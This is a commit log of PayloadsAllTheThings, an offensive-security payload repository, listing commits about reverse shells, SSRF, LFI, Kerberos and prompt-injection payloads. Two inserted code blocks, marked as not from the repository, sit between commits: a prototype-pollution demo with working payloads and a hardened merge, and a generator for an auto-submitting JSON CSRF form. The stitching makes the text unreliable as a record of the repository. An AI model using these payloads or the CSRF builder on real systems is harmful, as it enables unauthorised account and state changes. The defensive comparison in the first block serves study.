1503 Commits

Author SHA1 Message Date
Swissky
53d9014b2b Regular Expression ReDoS 2024-04-25 17:37:16 +02:00
Swissky
43a8c6a037 Adding socials buttons 2024-04-24 22:02:04 +02:00
Swissky
b245d3cbdd Mkdocs accessibility and search improvement 2024-04-15 21:20:02 +02:00
Swissky
293723d49d Merge pull request #712 from bsysop/patch-4
Adding "Hetzner Cloud" to the Summary
2024-04-05 18:55:52 +02:00
bsysop
dc461f170e Adding "Hetzner Cloud" to the Summary 2024-04-05 11:55:54 -03:00
Swissky
9571306b9f Merge pull request #711 from bsysop/patch-3
Adding Hetzner Cloud Metadata URL
2024-04-05 15:53:05 +02:00
bsysop
3c9fdec3da Adding Hetzner Cloud Metadata URL
https://docs.hetzner.cloud/#server-metadata
2024-04-04 23:43:34 -03:00
Swissky
80dda8beeb Merge pull request #710 from mohnad-0b/patch-1
Update SQLite Injection.md
2024-04-03 18:15:31 +02:00
Swissky
8ef458db2a Merge pull request #708 from xplo1t-sec/master
bypass techniques added
2024-04-03 18:15:03 +02:00
mohnad banat
d834abe43c Update SQLite Injection.md
Since sqlite version 3.33.0, sqlite_schema has been replaced by sqlite_master.
2024-04-01 20:46:09 +03:00
Swissky
b19dc0626a CICD - Mkdocs fixed the fonts problem 2024-03-31 16:03:48 +02:00
Swissky
55afcb12fb Removing social plugins from Mkdocs 2024-03-30 13:20:56 +01:00
Swissky
9cabd995fb Merge pull request #709 from mpgn/master
switch to nxc as cme is archived
2024-03-29 22:36:26 +01:00
mpgn
0d98284034 switch to nxc as cme is archived 2024-03-29 21:22:18 +00:00
xplo1t-sec
033982dc30 bypass techniques added 2024-03-09 21:46:33 +05:30
Swissky
dd2b68b70e PHP Deserialization + API keys table typo 2024-02-18 15:29:21 +01:00
Swissky
97cfeee270 Tools Update 2024-01-21 21:39:23 +01:00
Swissky
12c6531ad2 README - Update links to Internal All The Things 2024-01-12 16:18:36 +01:00
Swissky
c852118ec8 Web Cache Deception + phpt file format 2024-01-11 12:20:25 +01:00
Swissky
4b77292aeb Merge pull request #704 from therealtoastycat/patch-1
Adding reverse shell payload for OGNL
2024-01-05 15:45:19 +01:00
ToastyCat
05f441accf Update Reverse Shell Cheatsheet.md
adding details
2024-01-05 10:25:39 +01:00
Swissky
c6f96f7b2a Merge pull request #703 from Aftab700/JSON-Prototype-Pollution
adding the payload for Polluting the prototype via the `constructor` property in JSON input
2024-01-05 10:24:16 +01:00
Swissky
f96c1e4356 Merge pull request #701 from Vunnm/patch-1
specify condition to perform Angular JS Injection
2024-01-05 10:23:50 +01:00
ToastyCat
3d9363fdc9 Adding reverse shell payload for OGNL 2024-01-05 09:50:43 +01:00
Aftab Sama
08063f0830 adding the payload for Polluting the prototype via the constructor property in JSON input
Sometimes the `__proto__` property may not work, so adding the payload for Polluting the prototype via the `constructor` property in JSON input
2024-01-03 17:24:28 +05:30
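The `constructor` route that commit describes, shown end to end in an added example (this is not code from PayloadsAllTheThings or from that pull request): a naive recursive merge of untrusted JSON, the common half-fix that only strips `__proto__`, and a merge that refuses every key through which a prototype is reachable. The merge helpers, the two payload strings and the `polluted` marker property are constructed for this illustration.

```javascript
// Added example, not code from the PayloadsAllTheThings repository.
// A recursive "deep merge" of untrusted JSON into an options object, written the
// way many small merge/extend helpers are: it walks into whatever target[key]
// resolves to, including inherited properties such as Object.prototype (via
// "__proto__") or the Object constructor (via "constructor").
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (target[key] === undefined || target[key] === null) target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// The first "fix" usually seen: drop only the "__proto__" key.
// "constructor" still resolves to Object, whose "prototype" is Object.prototype.
function mergeBlockingProto(target, source) {
  for (const key of Object.keys(source)) {
    if (key === '__proto__') continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (target[key] === undefined || target[key] === null) target[key] = {};
      mergeBlockingProto(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: refuse the three keys that reach a prototype, and only ever
// descend into a plain object the target owns itself.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs one merge function on one JSON body and reports whether an unrelated,
// freshly created object now inherits the attacker's "polluted" property.
// Object.prototype is cleaned afterwards so each check starts from a clean state.
function pollutes(mergeFn, jsonBody) {
  const bystander = {};
  mergeFn({}, JSON.parse(jsonBody));
  const hit = ({}).polluted === 'yes' && bystander.polluted === 'yes';
  delete Object.prototype.polluted;
  return hit;
}

// Constructed payloads: the classic "__proto__" form, and the "constructor"
// form for when "__proto__" is stripped or ignored by the merge.
const PROTO_PAYLOAD = '{"__proto__": {"polluted": "yes"}}';
const CONSTRUCTOR_PAYLOAD = '{"constructor": {"prototype": {"polluted": "yes"}}}';

function demo() {
  return {
    naive_proto: pollutes(naiveMerge, PROTO_PAYLOAD),                        // true
    naive_constructor: pollutes(naiveMerge, CONSTRUCTOR_PAYLOAD),            // true
    blockProto_proto: pollutes(mergeBlockingProto, PROTO_PAYLOAD),           // false
    blockProto_constructor: pollutes(mergeBlockingProto, CONSTRUCTOR_PAYLOAD), // true: bypass
    safe_proto: pollutes(safeMerge, PROTO_PAYLOAD),                          // false
    safe_constructor: pollutes(safeMerge, CONSTRUCTOR_PAYLOAD),              // false
  };
}

console.log(demo());
```

Run it with `node` and compare the `blockProto_*` lines: the `__proto__`-only filter stops the first payload and is bypassed by the second, which is exactly why the second payload is worth keeping next to the first. A merge that creates its accumulator with `Object.create(null)` removes the inherited `constructor` as well, but the key denylist plus the own-property check is the fix that works for ordinary objects.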
Vunnm
27d19813f8 specify condition to perform Angular JS Injection
Indicate that ng-app in a root element is needed to inject an Angular JS template. Injecting the payload below without a root element with ng-app will not result in a successful injection.
2023-12-28 13:30:49 +01:00
Swissky
cbc6e78d2a SOCIAL - site url 2023-12-25 22:11:52 +01:00
Swissky
845fa52f8b SOCIAL - Cards 2023-12-24 14:05:50 +01:00
Swissky
5c42373a25 PHP filter prefix and suffix 2023-12-21 20:12:04 +01:00
Swissky
9fc0acc7e0 Merge pull request #700 from mschader/fix/ad-smbmap-fix-1
Update Active Directory Attack.md
2023-12-14 14:44:28 +01:00
Swissky
c579e6d043 Argument Injection 2023-12-14 14:38:39 +01:00
Markus
838d7c8c65 Update Active Directory Attack.md
Change recursive parameter for smbmap as listed in the documentation
2023-12-14 11:56:04 +01:00
Swissky
b07c5df892 CSS - Update style color + Blind SQL Oracle 2023-12-10 13:27:21 +01:00
Swissky
4a66a4ed25 CSS - Update style for Chrome 2023-12-04 10:46:10 +01:00
Swissky
1c42bfe5ca Merge pull request #698 from m10x/master
Added TInjA and the Template Injection Table
2023-12-03 18:56:44 +01:00
Maximilian Hildebrand
db1357bb3c Added TInjA and the Template Injection Table
Both are novel tools to help Pentesters / Bug bounty hunters to detect template injections
2023-12-03 13:15:47 +01:00
Swissky
57703ed7ed plocate and Azure AD updates 2023-12-01 22:21:05 +01:00
Swissky
bb71d4ad14 Merge pull request #696 from jenaye/PrintSpoofer
[Add] - Priv esc windows (PrintSpoofer)
2023-11-17 12:11:48 +01:00
enaylal
4684fed4aa add priv esc windows 2023-11-16 23:37:12 +01:00
Swissky
d93a228b40 Merge pull request #692 from jlkl/master
Add two methods about LFI to RCE via PHP PEARCMD
2023-11-12 18:21:16 +01:00
Swissky
3ba405954a Merge pull request #693 from bountyhacking/patch-1
Update README.md
2023-11-12 18:20:38 +01:00
Swissky
711b44c6b0 Merge pull request #695 from hebelsan/patch-1
latex injection add blacklist bypass
2023-11-12 13:15:46 +01:00
Alexander Hebel
ae3f91c88a latex injection add blacklist bypass 2023-11-12 11:13:41 +01:00
Swissky
d80068cc1b Privileged File Delete 2023-11-04 15:52:29 +01:00
Thomas Emerson Glucklich
49bc19e992 Update README.md 2023-11-01 11:32:31 -04:00
Swissky
46208ca898 Prompt Injection - RCE payloads 2023-11-01 13:56:38 +01:00
Swissky
ed081d7f29 Vulnerability Reports 2023-10-31 17:45:24 +01:00
Str3am
95a85b455d Add two methods about LFI to RCE via PHP PEARCMD, and delete extra double quotes in method 2 payload 2023-11-01 00:35:59 +08:00
Str3am
072cac04d6 Add two methods about LFI to RCE via PHP PEARCMD 2023-11-01 00:26:27 +08:00
Swissky
156990a2c6 Merge pull request #691 from itsparakh/patch-1
Update README.md
2023-10-30 18:17:56 +01:00
itsparakh
4500fdc447 Update README.md 2023-10-28 23:10:28 +05:30
Swissky
85871c6c14 Merge pull request #690 from idealphase/master
Update README.md (XSLT Injection)
2023-10-28 17:34:14 +02:00
Swissky
07cf2831ca AWS Key ID + UAC + Race Condition 2023-10-28 17:31:59 +02:00
idealphase
85310ba8e5 Update README.md (XSLT Injection)
Added Execute a remote php file using `file_put_contents`
2023-10-28 19:47:25 +07:00
Swissky
3ad350b753 Prompts Examples 2023-10-22 17:17:55 +02:00
Swissky
0f085798c7 Merge pull request #686 from swisskyrepo/prototype-pollution
Prototype Pollution Update
2023-10-18 18:47:31 +02:00
Swissky
ccccb34c61 Prototype Pollution Update 2023-10-18 18:46:41 +02:00
Swissky
c95a0a1a28 Merge pull request #681 from the-pythonist/the-pythonist-patch-1
Update README.md
2023-10-15 19:36:33 +02:00
Swissky
6c38c3cdda Merge pull request #682 from 0xblank/master
Fix typo in GraphQL Injection README.md
2023-10-15 19:35:32 +02:00
Swissky
d052949a6b Merge pull request #683 from swisskyrepo/rmi-update
Java beanshooter
2023-10-15 19:34:41 +02:00
Swissky
4b6db7b471 Java beanshooter 2023-10-15 19:31:16 +02:00
0xblank
51e8dc6378 Fix typo in GraphQL Injection README.md 2023-10-14 16:39:25 +02:00
the-pythonist
82c3cd92d1 Update README.md
Prefer ${IFS} to $IFS when doing filter bypass without space as $IFS does not work as a separator for certain commands.
2023-10-12 14:51:23 +02:00
Swissky
eebea7cb4d Merge pull request #680 from swisskyrepo/books-update
Update Books References
2023-10-12 10:23:48 +02:00
Swissky
886b64801d Update Books References 2023-10-12 10:22:37 +02:00
Swissky
46e446a06f Merge pull request #679 from swisskyrepo/msi-installer
MSI installer
2023-10-11 21:06:37 +02:00
Swissky
e86f221fe8 Fix typo in MSI installer 2023-10-11 21:05:54 +02:00
Swissky
5556f6ff79 MSI Installer - PrivEsc 2023-10-11 21:03:47 +02:00
Swissky
7f1823efbe Fix character matching for '>' and its URL entity encoding from @CaoZnZZ 2023-10-10 13:56:57 +02:00
Swissky
dd7525dc8f Merge pull request #630 from mtausig/patch-2
Add documentation for PDF JS PoC
2023-10-10 12:57:44 +02:00
Swissky
a95f11b32e Merge pull request #662 from Vunnm/master-1
Add JSON simple with form
2023-10-10 12:10:59 +02:00
Swissky
103f41898b Merge pull request #663 from cfpadok/develop
feat: add cognito-scanner tool for AWS pentest
2023-10-09 23:19:43 +02:00
Swissky
12e56724f1 Merge pull request #678 from aadi1011/master
Added Clickjacking Technique
2023-10-09 21:11:54 +02:00
Swissky
19f138d4ad Update README.md 2023-10-09 20:52:28 +02:00
Aadith Sukumar
a90cb7f2c7 Clickjacking Challenge 2023-10-09 11:38:37 +05:30
Aadith Sukumar
5115ac95e8 Improved References
Added Author names to references as requested in the CONTRIBUTING.md file.
2023-10-09 10:40:05 +05:30
Aadith Sukumar
2b54b5034f Fixed Anchor in Summary 2023-10-09 09:42:20 +05:30
Aadith Sukumar
ce4affc79b Update and rename Clickjacking.md to README.md 2023-10-09 09:40:28 +05:30
Aadith Sukumar
ad93bb5e22 Merge branch 'swisskyrepo:master' into master 2023-10-08 23:51:36 +05:30
Aadith Sukumar
bd42625b32 Create Clickjacking.md
Added a directory to discuss clickjacking attacks
2023-10-08 23:50:58 +05:30
Swissky
a71a793648 Merge pull request #676 from dahalsharad/add-wcd-exploit-description-and-image
added Web Cache Deception exploit, description and demonstrative image
2023-10-08 19:10:05 +02:00
sharad
37a4f8c977 added wcd exploit description and demonstrative image 2023-10-04 22:54:37 +05:45
Swissky
892c68e6e7 PEAR_Config example 2023-10-02 17:12:36 +02:00
Swissky
837f220264 LFI with pearcmd.php 2023-10-02 12:52:10 +02:00
Swissky
55edc9fc74 Fix MySQL duplicate cheatsheet 2023-10-01 12:45:12 +02:00
Swissky
d142587f28 Race Condition WIP + AD asreproast/kerberoasting 2023-10-01 12:42:20 +02:00
Swissky
a0475a2f45 Merge pull request #675 from nuts7/kerberoast-without-preauth
Add Kerberoasting w/o domain account
2023-09-30 18:51:19 +02:00
Swissky
485103e9bb IDOR Numeric, Hash, Wildcard and PRNG 2023-09-25 14:15:48 +02:00
Swissky
84569e18e4 Merge pull request #674 from eltociear/patch-1
Fix typo in README.md
2023-09-22 14:50:49 +02:00
nuts7
0cea24cfcb Add Kerberoasting w/o domain account
This commit adds a Kerberoasting technique without a domain account/credentials, just a user without pre-authentication (AS_REP Roastable)
2023-09-22 13:38:28 +02:00
Ikko Eltociear Ashimine
2aaeac91f8 Fix typo in README.md
appropiate -> appropriate
2023-09-22 00:11:33 +09:00
Swissky
83f1af0af0 Command injection update 2023-09-21 13:09:57 +02:00
Swissky
e9fb4f100c Google Web Toolkit 2023-09-19 09:58:22 +02:00
Swissky
59640ba51a MYSQL Wide byte injection (GBK) 2023-09-14 10:53:37 +02:00
Swissky
64a6e3eb04 Merge pull request #672 from manesec/master
Add MYSQL Wide byte injection
2023-09-14 10:25:12 +02:00
Mane
811d71026f Update MySQL Injection.md
fix typo
2023-09-13 08:33:03 -07:00
Mane
9574af9dd1 Update MySQL Injection.md
Add MYSQL Wide byte injection, it can be tested in Sqli-labs Less-32
2023-09-13 08:13:36 -07:00
Swissky
ed7c3a4e0c Merge pull request #671 from Thy-GoD/patch-1
Add automatic shell upgrade via rustcat.
2023-09-09 10:50:33 +02:00
Thigh_GoD
c7549916b8 Update Reverse Shell Cheatsheet.md
Added small quality adjustment.
2023-09-09 03:51:35 +08:00
Thigh_GoD
cf9b9bf70c Update Reverse Shell Cheatsheet.md
Added in automatic shell upgrade via rustcat.
2023-09-08 21:15:54 +08:00
Swissky
f9a2880ad5 Recover Public Key From Signed JWTs 2023-09-04 11:37:15 +02:00
Swissky
c030379871 Merge pull request #670 from superboy-zjc/master
Update Lodash SSTI
2023-09-03 17:30:52 +02:00
Swissky
a0c14e5299 SQL injections - WAF bypass 2023-09-03 14:26:03 +02:00
2h0ng
34da0e2708 Update Lodash SSTI
Update Lodash SSTI
2023-09-02 21:24:59 -04:00
Swissky
7752ff806f ASPNET Cookieless Bypass 2023-09-02 23:01:10 +02:00
Swissky
e879ca42a3 Merge pull request #668 from sethsec-bf/patch-1
Added CloudFox and CloudFoxable
2023-08-31 10:37:38 +02:00
Seth Art
339a51cd0d Added CloudFox and CloudFoxable 2023-08-30 14:11:11 -04:00
Swissky
53ec79abd0 Initial Access Cheatsheet 2023-08-26 22:01:45 +02:00
Swissky
930044d7c1 Merge pull request #666 from dwisiswant0/feat/ssrf-add-tool
feat(SSRF): add tool
2023-08-26 12:50:56 +02:00
Swissky
9db39952e7 Merge pull request #667 from PakCyberbot/master-1
Update SQLite Injection.md
2023-08-26 12:50:06 +02:00
Pak Cyberbot
d5922f421c Update SQLite Injection.md
Column names of the specified table can be more easily extracted in a better output.
Tested during the CTF
2023-08-25 15:24:52 +05:00
Dwi Siswanto
63379b9291 feat(SSRF): add tool 2023-08-25 16:34:45 +07:00
Swissky
b0dfcfd438 Hidden Parameters 2023-08-24 22:15:11 +02:00
Swissky
e2e2da74ce Merge pull request #664 from ScriptSathi/master
feat: Add Rust reverse shell for unix
2023-08-22 18:04:31 +02:00
Tristan D'audibert
aea130a1ac Add Rust reverse shell for unix 2023-08-21 17:50:11 +02:00
cfgs
538a7b024b feat: add cognito-scanner tool for AWS pentest 2023-08-08 10:41:54 +02:00
Vunnm
273da9e1b5 Add JSON simple with form
Add JSON simple payload with autosubmit form. Using an autosubmit form instead of Ajax allows bypassing some protections like the Standard Enhanced Tracking Protection in Firefox, which will refuse to send cookies with cross-site Ajax requests (tested with Firefox 115.0.2esr).
2023-08-05 14:39:33 +02:00
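As an added example that is not part of the repository or of that pull request: the `enctype="text/plain"` form trick that a "JSON with form" CSRF payload normally relies on, with an offline preview of the body the browser will send. The target URL, the throwaway `padding` key and the sample body are assumptions for the illustration. The form submission is a top-level navigation rather than a cross-site XMLHttpRequest, which is the difference the commit reports Firefox's tracking protection caring about; it does not help against cookies marked SameSite=Lax or Strict, and the endpoint must parse the JSON although the request's Content-Type is `text/plain`, not `application/json`.

```javascript
// Added example, not code from the PayloadsAllTheThings repository.
// With enctype="text/plain" the browser sends each field as "<name>=<value>\r\n"
// with no percent-encoding, so a JSON document can be split across the input's
// name and value, with a throwaway key absorbing the "=" the browser inserts.
function splitJsonForTextPlain(jsonObject, junkKey = 'padding') {
  const json = JSON.stringify(jsonObject);                 // {"role":"admin"}
  const name = json.slice(0, -1) + ',"' + junkKey + '":"'; // {"role":"admin","padding":"
  const value = '"}';                                      // "}
  return { name, value };
}

// The exact bytes the browser puts on the wire for that single field
// (one field only, so no field separator gets in the way).
function previewBody(jsonObject, junkKey = 'padding') {
  const { name, value } = splitJsonForTextPlain(jsonObject, junkKey);
  return name + '=' + value + '\r\n';
}

// The auto-submitting page: a top-level form POST instead of an Ajax call.
function buildJsonCsrfForm(targetUrl, jsonObject, junkKey = 'padding') {
  const { name, value } = splitJsonForTextPlain(jsonObject, junkKey);
  // Attribute-escape so the quotes inside the JSON survive HTML parsing;
  // the browser decodes them again before building the request body.
  const attr = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  return [
    `<form id="f" action="${attr(targetUrl)}" method="POST" enctype="text/plain">`,
    `<input type="hidden" name="${attr(name)}" value="${attr(value)}">`,
    '</form>',
    '<script>document.getElementById("f").submit();</script>',
  ].join('\n');
}

// Constructed sample: a body a hypothetical /api/profile endpoint would accept.
const SAMPLE_BODY = { user: 'victim', role: 'admin' };
console.log(previewBody(SAMPLE_BODY));
console.log(buildJsonCsrfForm('https://target.example/api/profile', SAMPLE_BODY));
```

The preview shows the server-side view: after `JSON.parse`, the body carries the intended keys plus `"padding": "="`, which is why the junk key must be one the endpoint ignores. Check the target with a real browser as well, since the body above is only a reproduction of the encoding rule.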
Swissky
d642e97d8d Merge pull request #661 from emmanuel-ferdman/wip
fix: broken link on AWS Amazon Bucket S3 page
2023-07-26 14:20:27 +02:00
Emmanuel Ferdman
20b8870123 fix: broken link on AWS Amazon Bucket S3 page
Signed-off-by: Emmanuel Ferdman <emmanuelferdman@gmail.com>
2023-07-26 15:09:56 +03:00
Swissky
e366ef9a13 Merge pull request #660 from yanncam/master
Added precision on the format, generation and breaking of NetNTLMv1
2023-07-25 15:28:12 +02:00
Yann CAM (ycam)
e80702d599 More details on NetNTLMv1 + typos
More details on NetNTLMv1 + typos
2023-07-25 11:31:35 +02:00
Yann CAM (ycam)
4336cb1fd5 Update NetNTLMv1 breaking methodology
Add SHuck.Sh/ShuckNT process and details.
2023-07-25 11:11:36 +02:00
Swissky
b715364547 Fix typo 2023-07-18 22:19:29 +02:00
Swissky
52ef85a830 WebSocket Tools 2023-07-18 22:17:51 +02:00
Swissky
fbc43be79f Merge pull requests 2023-07-18 18:24:14 +02:00
Swissky
87e6f55e16 Error Based XXE - Local DTD 2023-07-18 18:23:34 +02:00
Swissky
359b9b435e Merge pull request #659 from preemptible/patch-1
Update BOOKS.md
2023-07-18 10:21:23 +02:00
Swissky
3de6c41823 Merge pull request #658 from NaxnN/patch-2
Update SQLite Injection.md
2023-07-18 10:20:20 +02:00
preemptible
6d12abb4ec Update BOOKS.md
I added 'black hat Rust', a great book in my humble opinion.
2023-07-18 11:16:36 +03:00
KeoOp
d5f85f13d5 Update SQLite Injection.md
add "group_concat" so that all tables can be extracted at once when the query only returns the first item
2023-07-16 23:44:00 +08:00
Swissky
cd19bb9409 Business Logic Errors + Mass Assignment 2023-07-09 13:01:03 +02:00
Swissky
b68ce28c4b Open Redirect + SSI Injection 2023-07-08 10:09:59 +02:00
Swissky
86e246dd03 Prototype Pollution 2023-07-07 23:10:33 +02:00
Swissky
0a75beeccd Merge pull request #652 from clem9669/master
Update README.md for Latex injection
2023-06-29 12:27:22 +02:00
clem9669
fa3cf25c55 Update README.md 2023-06-29 10:19:14 +00:00
Swissky
f723ef4878 Merge pull request #651 from JLLeitschuh/patch-3
Add new AWS IPv6 SSRF Endpoint
2023-06-29 10:59:10 +02:00
Swissky
9711417161 Update README.md 2023-06-29 10:59:02 +02:00
Swissky
a8161ef48c Merge pull request #650 from Xhoenix/master
update ssrf payloads
2023-06-29 10:41:31 +02:00
Jonathan Leitschuh
bb3f865e10 Add new AWS IPv6 SSRF Endpoint
Documentation: https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/instancedata-data-retrieval.html
2023-06-28 18:51:53 -04:00
Jitendra Patro
384f54af54 Merge branch 'swisskyrepo:master' into master 2023-06-28 15:51:00 +05:30
Jitendra Patro
391b18cf20 update bypass localhost with [::] payloads 2023-06-28 15:50:43 +05:30
Swissky
70396ec71d Merge pull request #649 from MotiHarmats/patch-1
Add CI/CD payloads
2023-06-28 10:26:10 +02:00
Swissky
ec11a14e4e Merge pull request #648 from mpgn/master
Use new official CME repository
2023-06-28 10:18:55 +02:00
MotiHarmats
de8d4796af Add CI/CD payloads 2023-06-28 11:15:58 +03:00
mpgn
35b0d672f0 Use new official CME repository 2023-06-28 10:12:15 +02:00
Swissky
113afae290 AWS EC2 Metadata + SSSD token deobfuscate 2023-06-27 15:45:29 +02:00
Swissky
5ddd8e04da MSSQL - Stacked Queries Delimiters 2023-06-25 00:02:54 +02:00
Swissky
e9c1ce1c09 AWS Key Patterns 2023-06-22 19:03:06 +02:00
Swissky
fc36b38430 DOM Clobbering 2023-06-10 20:08:23 +02:00
Swissky
726de9e9b2 Merge pull request #645 from azurit/ssrflocalhost
SSRF: bypass using IPv6/IPv4 Address Embedding
2023-06-09 10:48:54 +02:00
Swissky
10df57a531 Type Juggling 2023-06-09 10:46:54 +02:00
Swissky
de6e91657d Type Juggling - Loose Comparison and Exploit 2023-06-09 10:45:45 +02:00
Swissky
f0d02d2414 Merge pull request #647 from noraj/patch-1
xxe - go secure workshop
2023-06-08 11:09:10 +02:00
Swissky
aba6f1e731 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2023-06-08 11:07:39 +02:00
Swissky
93fa4df7cd Prompt Injection 2023-06-08 11:06:37 +02:00
Alexandre ZANNI
3e8a39a87d xxe - go secure workshop 2023-06-08 10:14:35 +02:00
Swissky
e17b6e1ac4 Merge pull request #646 from NaxnN/patch-1
Update SSTI README.md
2023-06-07 09:46:59 +02:00
KeoOp
598d2ca3fa Update README.md 2023-06-07 14:15:07 +08:00
Swissky
b8c803717a WDAC Policy Removal + SSRF domains 2023-05-31 14:18:25 +02:00
azurit
226569b753 Update README.md 2023-05-21 14:54:42 +02:00
Swissky
f85f2cb4c6 Merge pull request #644 from rdbo/patch-1
Fixed typos on README.md
2023-05-18 13:32:58 +02:00
Rdbo
83b2d80a56 fixed typos 2023-05-18 01:58:36 +00:00
Swissky
0a07e07d00 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2023-05-15 19:23:58 +02:00
Swissky
6adfe5d865 GraphQL Batching Attacks 2023-05-15 19:23:07 +02:00
Swissky
af4ade2a44 Merge pull request #643 from p0dalirius/patch-2
SSTI / jinja2 : Removed dot in lipsum.__globals__.["os"]
2023-05-09 20:16:05 +02:00
Rémi GASCOU (Podalirius)
b3f98adf0c SSTI / jinja2 : Removed dot in lipsum.__globals__.["os"] 2023-05-09 20:15:02 +02:00
Swissky
8d2c30e969 Merge pull request #642 from p0dalirius/patch-1
Adding Jinja2 RCE through lipsum in Templates
2023-05-09 18:58:57 +02:00
Rémi GASCOU (Podalirius)
9c2b040242 Adding Jinja2 RCE through lipsum in Templates 2023-05-09 18:34:35 +02:00
Swissky
5af6a23a2e DPAPI LocalMachine + BitLocker 2023-05-08 17:08:25 +02:00
Swissky
0dd92aa89d Merge pull request #640 from m3dsec/patch-2
Add Kerberos CVE-2022-33679 (RC4 Is Still Considered Harmful)
2023-05-08 16:22:30 +02:00
m3dsec
8156f495fb Add Kerberos CVE-2022-33679 (RC4 Is Still Considered Harmful) 2023-04-30 21:45:33 +01:00
Swissky
55df53105e Merge pull request #639 from TomWilford/master
Added Twig 'passthru' filter exploits
2023-04-28 16:24:20 +02:00
Tom Wilford
c1dc141e13 Added 'passthru' filter exploits 2023-04-28 14:47:59 +01:00
Swissky
1e66a42bba Merge pull request #638 from ZkClown/master
Add some stuff on Office exec, Network Recon and Active Directory methodo
2023-04-20 21:31:23 +02:00
ZkClown
0f4d747913 Add injection into AD through ldap signing not required and ldap channel binding disabled 2023-04-20 15:38:26 +02:00
ZkClown
8b543c80aa Add network scan with pure bash 2023-04-20 15:21:48 +02:00
ZkClown
2a4ce78080 Add Office execute WinAPI via VBA 2023-04-20 15:00:33 +02:00
Swissky
b0445a7250 Merge pull request #637 from ZkClown/master
Add PowerShell Reflection through Delegate Type and Basic HTML Smuggling
2023-04-19 21:51:04 +02:00
ZkClown
47df1695a1 Add PowerShell Reflection through Delegate Type and Basic HTML Smuggling 2023-04-19 17:59:10 +02:00
Swissky
e717839fda Merge pull request #635 from MatteoPaier/fix-param-pollution-golang
Fixed Golang net/http param pollution outcome
2023-04-14 17:48:01 +02:00
Swissky
6861c46fcd MySQL MSSQL Oracle SQL Update 2023-04-14 17:45:45 +02:00
Matteo Paier
c3f5da6014 Fixed Golang net/http param pollution outcome 2023-04-14 14:41:35 +02:00
Swissky
25d2be529f BadSecrets Tool 2023-04-12 13:12:33 +02:00
Swissky
ff6c22b86e Merge pull request #634 from mpgn/master
Fix path with sessionS with an S for php
2023-04-12 11:27:26 +02:00
mpgn
3c7c863233 Fix path with sessionS with an S for php 2023-04-11 17:08:57 +02:00
Swissky
14c6c9642d Merge pull request #633 from harunoz/patch-1
Update README.md
2023-04-09 18:41:00 +02:00
Harun
87e78b4c4b Update README.md
Added Node.js
2023-04-09 12:35:43 -04:00
Swissky
86cc53244d LOL Drivers 2023-04-07 09:22:07 +02:00
Swissky
30d17b4924 Fix markdown typo ESC1-9 2023-04-05 12:47:47 +02:00
Swissky
0a70636d28 ETW Providers 2023-04-03 10:48:53 +02:00
Swissky
d040c0e677 Web Cache Deception Methodology 2023-03-28 21:53:53 +02:00
Swissky
fddd094ee1 LFI iconv and dechunk + ETW + NTDS Dump Rework 2023-03-27 22:38:25 +02:00
Swissky
dd0c23f9a2 ImageMagick Typo 2023-03-19 22:46:56 +01:00
Swissky
723b3213b2 Windows Information Protection 2023-03-18 19:55:43 +01:00
Swissky
579207aa8f JWT jku and jwks - manual exploitation 2023-03-12 18:02:29 +01:00
Swissky
d5729888c3 S4U Extension 2023-03-11 17:53:16 +01:00
Swissky
b88457367b Active Directory Integrated DNS 2023-03-11 11:52:52 +01:00
Swissky
5e8737485b Fix responsive - rollback - FF was glitching 2023-03-11 00:11:27 +01:00
Swissky
648f4ad2ca Fix responsive icons 2023-03-10 23:45:27 +01:00
Swissky
084efe8a6b Fix responsive display on PATT Web 2023-03-10 23:20:39 +01:00
Swissky
f379b60ef1 Web Theme + Credential Guard + PPL 2023-03-10 22:14:22 +01:00
Mat
5817de1fb2 Add documentation for PDF JS PoC 2023-03-07 17:10:23 +01:00
Swissky
e43f1527c0 JWT rework 0.2: jwks + kid + cve 2023-03-07 11:39:39 +01:00
Swissky
2a3d175620 GraphQL and JWT rework v0.1 2023-03-05 12:05:43 +01:00
Swissky
776b2bd934 Merge pull request #629 from maxence-Doyensec/file-upload-uwsgi
add uwsgi configuration file to Upload Insecure File
2023-03-01 15:13:07 +01:00
Maxence Schmitt
5f8b3f8a14 add uwsgi configuration file to Upload Insecure File 2023-03-01 14:49:31 +01:00
Swissky
7ef9babc9f Merge pull request #627 from noraj/patch-1
add "GraphQL for Pentesters" ref
2023-02-26 14:14:56 +01:00
Alexandre ZANNI
9bdfa7f8c7 add "GraphQL for Pentesters" ref 2023-02-25 23:09:47 +01:00
Swissky
ecc241d17e Merge pull request #626 from mschader/patch-10
Web Sockets: Update README.md
2023-02-24 18:08:28 +01:00
Markus
d57dcabf46 Web Sockets: Update README.md
Update outdated link to blog post and add Hacktricks as reference
2023-02-24 10:37:52 +01:00
Swissky
c9d0878817 Kerberos Tickets Dump, Convert, Replay 2023-02-21 23:21:22 +01:00
Swissky
2a65b59c01 RODC + PAM Trusts 2023-02-20 18:44:44 +01:00
Swissky
a38701a7e2 MOTD + SpEL injection 2023-02-20 17:21:43 +01:00
Swissky
d3ccbb5370 Merge pull request #610 from somebodyoncetoldme207/patch-1
Typo corrections in PostgreSQL Injection.md
2023-02-18 22:23:52 +01:00
Swissky
cedf4aa9f6 Office Default Passwords + SMBExec 2023-02-17 12:01:52 +01:00
Swissky
8442b304c9 SMBExec + Refresh & Access Token Azure 2023-02-15 17:03:49 +01:00
Swissky
411f2455a9 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2023-02-15 12:34:26 +01:00
Swissky
ae46ac0338 WMIExec + SharpSCCM 2023-02-15 12:33:20 +01:00
Swissky
73996ea52a Merge pull request #624 from Techbrunch/patch-13
Update sponsor link
